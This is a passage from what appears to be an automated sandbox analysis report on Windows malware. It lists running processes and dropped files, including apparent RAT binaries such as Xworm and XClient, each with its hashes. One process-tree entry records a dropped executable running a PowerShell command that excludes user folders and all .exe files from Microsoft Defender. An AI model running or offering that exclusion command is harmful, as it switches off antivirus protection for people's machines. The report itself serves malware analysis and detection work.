                                                                                                                                                                  PID:868
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3436
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3452
                                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3812
                                                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3880
                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3892
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3964
                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4260
                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                              C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4400
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4884
                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3328
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1956
                                                                                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4524
                                                                                                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1708
                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:1912
                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:2936
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3336 -ip 3336
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1660
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4352 -ip 4352
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5076
                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2984
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4192 -ip 4192
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3464
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2656 -ip 2656
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1828
                                                                                                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:1152
                                                                                                                                                                                                        • C:\ProgramData\Mig\Mig.exe
                                                                                                                                                                                                          C:\ProgramData\Mig\Mig.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:2916
                                                                                                                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                            PID:404
                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5036

                                                                                                                                                                                                          Network

                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.scr

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1.0MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            c63860691927d62432750013b5a20f5f

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            03678170aadf6bab2ac2b742f5ea2fd1b11feca3

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            69d2f1718ea284829ddf8c1a0b39742ae59f2f21f152a664baa01940ef43e353

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            3357cb6468c15a10d5e3f1912349d7af180f7bd4c83d7b0fd1a719a0422e90d52be34d9583c99abeccdb5337595b292a2aa025727895565f3a6432cab46148de

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            627073ee3ca9676911bee35548eff2b8

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            5b74da6778ccaa0e1ca4ae7484775943

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            0a2f6f315a0ca1a0366b509aec7b13c606645654

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            12KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            ba8c4980c202314c46e41de2cee1b8c4

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            382df06e3fb72bd10bd11e2fde7fa7277eea9282

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            6ec0fa77e396d00ccf0e972a96210ae38f8629b266db41b35134cbd58edbf675

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            4125ca7fd5e1fac2e5b2829ab9fc2f881dbfe29800c290d26c195d52bc4c23496badec3e50ed070c49b37db844ad3cde972d0d555a13df7a6bc3365bf7a98ea7

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            12KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            fd90c0672114f6edba96efa50ea5cc99

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            35b33fc6fb152fa02b854a1d88c345edcf39f11a

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            c2b9519026bc479d7d4d33dd4029ae88037f25b36440ab33355b311054dba141

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            2368e11f49a5b97405562e86f047e7a744ef3a1e3f2cf2039e089fcc184d9c147b8d820858c87ac90ed4097cf4170088b529ef1e8d99da2f889519299fab02c1

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            16KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            fdfd4f0c87cc405795e9c9ba4fde954a

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            64546eba51d85057159b762d1a483309a2ea67b3

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            d38eb889c091dcb657aed191edc772984d6906494f0f06d40985f9cde5c80532

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            c83b420aec4b07cbcde4e1616e837bba195bca00ab5796884cea26d4128f884696d34cf51f18125c12f1b5ec518ca21b4bcd774a3b77a0cb4823c12efebb5090

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            944B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            6344564097353c8e7e68991fffa80d88

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            2ac4d108a30ec3fbd2938b0563eb912415ea7c62

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            d0af6d69f8bc0c98e9fb61dead6327bbc8b4f5292529313515382d8f883de0da

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            e2b37a9001a91cb05483d72f88bd70a61ca5655939c2290fd1580710eec9d8d26a5fedbcb5223f5413b5dcc46f1d8b6b408e57be0e4ad4b37b55cbce9023a303

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            944B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            795938d4c6e7dbca544ec4bdca81c53a

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            0ca41665a9b6b0c3159211aed5fc595de98afb6b

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            dc400265ecb7f850894b2b648b956964d4fe75639f76bb3634a1f73c3182dbcb

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            19d36e5b648a1d5faa7d7d67d454f0157f99a546532bcf538b1ff81b4acc126124ea937e143a49eb91dce2e657a53378b327078aaacb5c2a8c54a5249a5efff5

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2510.vbs

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            114B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            34b33b5a437e20d03d79b62a797dfe99

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            9b57b598a7e9d66157a05a44bc7c097bf5486e6c

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2998.vbs

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            125B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            8b4ed5c47fdddbeba260ef11cfca88c6

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            868f11f8ed78ebe871f9da182d053f349834b017

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4911.vbs

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            117B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            bb8cfb89bce8af7384447115a115fb23

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6a0e728f4953128db9db52474ae5608ecee9c9c3

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Bukkake.cmd

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            33KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            8fe00be344a338f96b6d987c5c61022d

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            978e4cf1ca900c32d67dde966d5b148d25cec310

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            6b938320d9a1d9dc9ff337ec6c5284519ff1838bd1c7b5c0c1f093f0bba2d399

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            216dd64298e1315d307072b557351ee06c949816f868153b178ecc1f809cd099aae7e90a9af4c1a6826e9315b7a35843e9b7121f89baccf4cedab754b51784e8

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Extensions\chrome\Default\Local Storage\leveldb\CURRENT

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            16B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            46295cac801e5d4857d09837238a6394

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Extensions\chrome\Default\Local Storage\leveldb\MANIFEST-000001

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            41B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\WZSE0.TMP\TikTok18.bat

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            233B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            5bdba5f40a247b93e7daa21c847f89fe

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            95749fa521b8bbf78f55a3cd548776868bb231b7

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            16ae7d080a43e93f75b59b87b19248492422ce1a49fb6e275d483947a52076cb

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            0cd57205312e1fdf1429d8c6dd1e424c83dde2e22d57cb28aa34e660d440733bfec4d6fe41a607772567d12b3baa1b0d7ef4f5287a59dbbd8a48f54b11037f75

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rdqx1f2p.qng.ps1

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            60B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4.2MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            978752b65601018ddd10636b648b8e65

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            2c0e320cb0d84c6760a925d873d58e701e3e6cb1

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            8bf64a9906e8177eab206dac3a550bc5918213659f98eac6295b8e24184eb782

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f29382d1c14cff16ee09febc5e3c875580de84494ba0510fcae06a1e024ffd00c96d3e962d2da2132ebd864d085218c79979c1df7f3334ea2e26b5ed39cbdbe1

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\333.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            243KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            b73ecb016b35d5b7acb91125924525e5

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            37fe45c0a85900d869a41f996dd19949f78c4ec4

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            426KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            82bb7a2c4d05216ec5fc07aa20324bc1

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            3f652844912f6c134c656da0ef35750c267016dd

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            56e333f04b51aa90a9d086eb855ac51b23c19170f7989f770f6a56383cffe8f2

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            efc991b07660b93c2562c58c91bb4ce1f8f907848e3f2ac4c45c80016025148877cf25df336afd041106fa35376ffe2868695c92d2c6f81ae107d16c7cdf051a

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            439KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            bf7866489443a237806a4d3d5701cdf3

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            ffbe2847590e876892b41585784b40144c224160

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            1070bf3c0f917624660bef57d24e6b2cf982dce067e95eb8a041586c0f41a095

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            e9bb9d5157d2011eed5f5013af4145877e3237def266f2cc6fd769ed7065a4fa227f7d316de5fc7eeae8f3f852b685fb3cc166127f79134f1fa1a200b8c0c186

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1.0MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            73507ed37d9fa2b2468f2a7077d6c682

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            f4704970cedac462951aaf7cd11060885764fe21

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            3.4MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            d59e32eefe00e9bf9e0f5dafe68903fb

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            99dc19e93978f7f2838c26f01bdb63ed2f16862b

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            e06aa8ce984b22dd80a60c1f818b781b05d1c07facc91fec8637b312a728c145

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            56a3790205885d12252109fdf040e5527fad8a11811e7471e7d406781c9bb4e3514b074daf933a3865de03f99cd13d93203d5478a69e87692cdd016741b73587

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2.4MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            70a396a9f154f9a70534b6608e92cb12

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            1a4c735936c372df4f99a3ff3a024646d16a9f75

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            51638445d940ee396b2d963473fa473840459920f0201a765ccb8cf8869741d5

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            72322ef6c4ee7c278dccd755a487463e09e34551a2fd3f1fe7ba1bc216e275e7e17f36dbcf4f48b48875f416affc41bf9d2617fbd7fde759f265e7bdd55cc203

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            409KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            4ea576c1e8f58201fd4219a86665eaa9

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            efaf3759b04ee0216254cf07095d52b110c7361f

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            d94206d9509cc47cae22c94d32658b31cf65c37b1b15ce035ffaa5ce5872ad2f

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            0c7462bc590d06f0ead37246f189d4d56e1d62ff73f67bf7e2ce9c653d8c56812a5f1306fb504168f7e33b87485c3465ea921a36f1ba5b458d7763e45c649494

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\XClient.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            32KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            ce69d13cb31832ebad71933900d35458

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            e9cadfcd08d79a2624d4a5320187ae84cf6a0148

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            14.9MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            3273f078f87cebc3b06e9202e3902b5c

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            03b1971e04c8e67a32f38446bd8bfac41825f9cc

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            4b6caa8467cf7ca3d7a3d3b2ac70e48510b7c4570e4810f3305aca1ef6cdf85c

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            2a0bc7bf3ffd2f2e027e0feffb803f76dd11da48335e1b66a3c1927410e0a82c6ce212901c2ace9eca5bcce51eee49a12dc4619fc31711f0770e2d55ab7730f9

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            254KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            892d97db961fa0d6481aa27c21e86a69

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            1f5b0f6c77f5f7815421444acf2bdd456da67403

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            7fe31101f027f2352dea44b3ba4280e75a4359b6a822d813f9c50c0d6ef319b7c345280786c1bc794b45fbd4fa87939a79cc15b82fc7959ccce1b732f33ba241

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\file.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            50KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            16b50170fda201194a611ca41219be7d

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            2ddda36084918cf436271451b49519a2843f403f

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            a542a2170abf4de0cd79baeb2e8f08deaf6fdeea40e9fc1ec15cbeb988e7900a

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f07ed33310acc5008cda9dbf3c50e420ad3f76ed11b28b93b2bb32d47ddbb64c97b906babaf6edf2680bea5b6f7456c7986a8610cee30b867d3a07c4430f79e0

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\filer.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            25.7MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            9096f57fa44b8f20eebf2008a9598eec

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            42128a72a214368618f5693df45b901232f80496

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            ad29f94040532ab78679ec9e50d58d8ccef3f99d5ab53ef7c654527b9b2634da4c44375b2ca2d54a83d1dd1e0fa9b1d1a13241ffe0328bea07740166927521b2

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            9.3MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            b248e08a7a52224f0d74d4a234650c5b

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6218a3c60050b91ad99d07eb378d8027e8e52749

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            746454b0fce64c3b29b5279e2ca7c6c68a41b9b5f0cce71449f9fffe0be9cce1

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            5ef1bd0c480e635aafa517b57d5bc8dbf577c54dfac9a7887d67761e3017b6a90f5607ced3717c61db9e44833500295e978c88c64d268725aa55230e83c470a8

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\pantest.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            354KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            312f2c6630bd8d72279c8998acbbbeba

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            8f11b84bec24f586a74d1c48d759ee9ec4ad9d54

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            706dccc82df58b5d49a8bcccc655a9dce0d47410bc922eb9a91108e5a1f82cfb

                                                                                                                                                                                                            SHA512

